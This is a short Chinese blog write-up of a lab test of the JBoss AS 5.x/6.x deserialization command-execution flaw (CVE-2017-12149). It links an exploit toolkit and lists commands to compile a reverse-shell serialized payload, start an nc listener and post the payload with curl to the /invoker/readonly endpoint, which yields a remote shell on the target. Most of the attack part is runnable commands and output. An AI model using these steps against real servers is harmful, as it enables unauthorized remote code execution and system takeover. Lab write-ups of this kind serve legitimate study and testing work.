jboss java反序列化命令执行漏洞_JBOSSAS 5.x/6.x 反序列化命令执行漏洞(CVE-2017-12149)...

本文主要记录一下JBOSSAS 5.x/6.x 反序列化命令执行漏洞的测试过程

仅供学习

靶机地址:192.168.1.102  服务端口:8080

测试机: 192.168.1.100

63fd7b347853b5ae8dd26dee8bb60243.png  

c83784de0b572c64cbe29cb61b18d161.png

响应码500,证明漏洞存在。

下载漏洞利用工具: http://scan.javasec.cn/java/JavaDeserH2HC.zip

编译:(需要java环境)

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

运行:

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port   //反弹shell的IP和端口

starnight:JavaDeserH2HC starnight$ javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

starnight:JavaDeserH2HC starnight$ java-cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.1.100:1337Saving serializedobject in ReverseShellCommonsCollectionsHashMap.ser

这样就会将序列化对象保存在ReverseShellCommonsCollectionsHashMap.ser中,用curl命令发送到Jboss服务地址。

先在测试机运行nc命令,进入监听模式:

starnight:temp starnight$ nc -lvv 1337

再打开另一个控制台,运行如下curl命令:

starnight:JavaDeserH2HC starnight$ curl -v http://192.168.1.102:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

运行截图:

56b63e9ca60988da215fd508c35fa16d.png

左侧是获取到shell,并执行命令。右侧是用curl命令运行截图。

References

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值